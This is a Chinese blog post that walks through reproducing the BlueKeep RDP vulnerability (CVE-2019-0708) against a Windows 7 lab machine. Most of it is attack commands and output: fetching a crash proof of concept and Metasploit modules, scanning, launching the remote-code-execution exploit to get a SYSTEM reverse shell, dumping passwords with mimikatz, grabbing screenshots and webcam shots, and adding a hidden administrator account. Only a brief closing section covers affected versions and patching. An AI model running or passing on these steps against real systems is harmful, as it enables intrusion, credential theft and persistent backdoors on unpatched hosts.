1. 首页
  2. 技术小贴

漏洞复现:”CVE_2019_0708 BlueKeep”

环境篇

技术小贴
技术小贴
  • Windows7 ultimate sp1 x64
  • MSF

开启远程桌面:

image.png

关闭防火墙:

image.png

利用篇

早期蓝屏

这是早期漏洞利用POC!

git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
pip3 install impacket
python3 crashpoc.py 192.168.173.136 32  #python3 crashpoc.py ip地址 系统类型

漏洞复现:"CVE_2019_0708 BlueKeep"

注:以上POC,不需要关闭防火墙即可打穿WIN7

获取shell

下载攻击脚本:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

导入攻击脚本:

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

漏洞探测:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.173.136
set threads 5
run

[*] 192.168.173.136:3389  - Detected RDP on 192.168.173.136:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389  - The target is vulnerable.
[*] 192.168.173.136:3389  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

漏洞利用:

reload_all   #加载攻击脚本
search cve-2019-0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.173.130
set rport 3389
set target 3    #因为我们使用的是VMware,所以可以使用target 3
exploit

[*] Started reverse TCP handler on 192.168.173.1:4444
[*] 192.168.173.136:3389  - Detected RDP on 192.168.173.136:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389  - The target is vulnerable.
[*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.173.136:3389 - Surfing channels ...
[*] 192.168.173.136:3389 - Lobbing eggs ...
[*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800

session 1
session 1
'session' ڲⲿҲǿеij
ļ

C:Windowssystem32>whoami
whoami
nt authoritysystem
#成功拿到Shell,并且为System权限
#第一次explloit导致Win7蓝屏,之后正常获取Shell

target数值的说明:

  1. 根据指纹自动判断
  2. 真实机器
  3. Virtual Box虚拟机
  4. Vmware虚拟机

权限提升

meterpreter > getuid         #获取uid
meterpreter > screenshot     #截图
meterpreter > webcam_scream  #抓拍
meterpreter > load mimikatz  #获取系统密码
meterpreter > wdigest        #获取系统密码
rdesktop 192.168.173.138     #登录远程桌面

net user root$ root /add
net localgroup administrators root$ /add

本次实验机器为win7,windows server 2008需要修改注册表,否则会蓝屏。

[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerWinStationsRDP-TcpfDisableCam]值修改为0

加固篇

影响版本

Windows Server 2008 (R2)

Windows 7 SP1

Windows Server 2003

Windows XP

临时加固

  • 禁止掉3389远程端口

热补丁

参考:奇安信CVE-2019-0708漏洞热补丁工具使用手册

原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/bluekeep/

联系我们

176-888-72082

在线咨询:点击这里给我发消息

邮件:2668888288@qq.com

工作时间:周一至周五,9:00-18:00,节假日休息

QR code